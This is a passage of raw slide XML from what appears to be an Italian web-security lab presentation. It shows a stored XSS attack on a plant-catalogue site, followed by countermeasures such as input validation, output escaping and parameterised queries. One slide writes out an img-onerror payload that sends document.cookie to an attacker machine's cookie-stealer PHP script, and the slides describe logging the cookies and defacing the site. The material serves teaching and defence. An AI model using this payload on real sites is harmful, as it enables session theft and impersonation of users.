                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> verso la homepage stessa senza creare sospetti evidenti. In questo modo, si sarebbero potuti utilizzare i cookie prelevati per accedere ad altri account, impersonando gli altri utenti senza destare sospetti immediati.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD6E1AB0-C23A-20C8-B132-FFA35B48C34D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4002006" y="4429592"/>
            <a:ext cx="4237533" cy="1742608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1173546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l" fontAlgn="auto">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Lo script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> effettua le seguenti operazioni:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Imposta la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> sulla pagina utilizzata per il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Defacement</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Preleva il Cookie dalla richiesta in arrivo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Definisce il file di log dove andrà a scrivere i cookie prelevati</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Scrive il cookie all'interno del file di log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, Carattere, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{806BC8B5-90A8-4ADC-0FF2-9B37B3C3B222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617253" y="4372143"/>
            <a:ext cx="6046750" cy="1937217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159524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Una volta pronta la macchina attaccante, James </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>inserisce il seguente script nel campo di inserimento input del nome della pianta.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E015040-327F-9124-C5A8-0E9BCD940466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1199587" y="3377558"/>
            <a:ext cx="3583430" cy="2308753"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CasellaDiTesto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F90DE2B-3DFB-F155-0267-C7C724397BB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5011838" y="3429000"/>
            <a:ext cx="6844823" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Input:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>='http://192.168.56.102/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cookiestealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cookiestealer.php?c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo, Carattere, numero, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3E71CA5-982E-3A3E-F152-3A2E3EDF5727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391586" y="5394370"/>
            <a:ext cx="6844823" cy="1148123"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3045191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dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Nel momento in cui Alice o David decideranno di accedere al sito, vedranno la pagina di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>defacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF15BF02-D2CC-BC91-1E53-DA319CB3FE4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355929" y="3151208"/>
            <a:ext cx="5332963" cy="1945704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Immagine 11" descr="Immagine che contiene testo, schermata, linea, Diagramma&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F33C5BB-B1A1-31E3-A22F-0CCFFB39352A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="866669" y="3429000"/>
            <a:ext cx="3895840" cy="1945704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Immagine 15" descr="Immagine che contiene testo, schermata, linea, ricevuta&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A003F629-F740-45B1-4449-B0C111AED44E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2763894" y="4289891"/>
            <a:ext cx="3997230" cy="2057665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="826855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Furto di cookie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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>James, sulla sua macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,  nel file di log, vedrà che avrà raccolto il cookie di Alice e David.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C53AE4F-E98D-6ADC-DB34-F07E8DB2AB76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3375789" y="3070126"/>
            <a:ext cx="5235776" cy="3102074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2577529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7E50782-1BAC-5B09-1C74-FE67B72283E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err="1"/>
              <a:t>Contromisure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="44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locca con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DE5628-2050-114E-1607-AA4FA92781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560099" y="625683"/>
            <a:ext cx="5455380" cy="5455380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2420582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Contromisure adottate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Segnaposto contenuto 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08AFBDDC-470D-B5EA-4205-ABDB6FEAC479}"/>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Per risolvere le vulnerabilità presenti nel sistema e prevenire attacchi come SQL Injection e XSS, sono state adottate una serie di misure di sicurezza.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>per login e registrazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Validazione dati in input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Sanitizzazione dei dati in input e output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> output</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>uery parametrizzate</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Crittografia delle password</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Gestione delle sessioni e dei cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308556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POST per login e registrazione</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Segnaposto contenuto 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08AFBDDC-470D-B5EA-4205-ABDB6FEAC479}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="2478024"/>
            <a:ext cx="5285232" cy="3694176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Per garantire una maggiore sicurezza nell'applicazione per l’invio di dati sensibili è stata adottata l'utilizzo del metodo POST per il login e la registrazione, sostituendo il metodo GET che è considerato meno sicuro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Riservatezza dei dati: vengono inviati nel corpo della richiesta HTTP e non sono visibili nell'URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Crittografia dei dati: i dati inviati tramite il metodo POST possono essere crittografati utilizzando protocolli di sicurezza come HTTPS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Protezione da cache e registri: I dati inviati tramite il metodo POST non vengono memorizzati nella cache del browser o nei registri del server, riducendo il rischio di esposizione indesiderata delle informazioni.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, software&#10;&#10;Descrizione generata automaticamente">
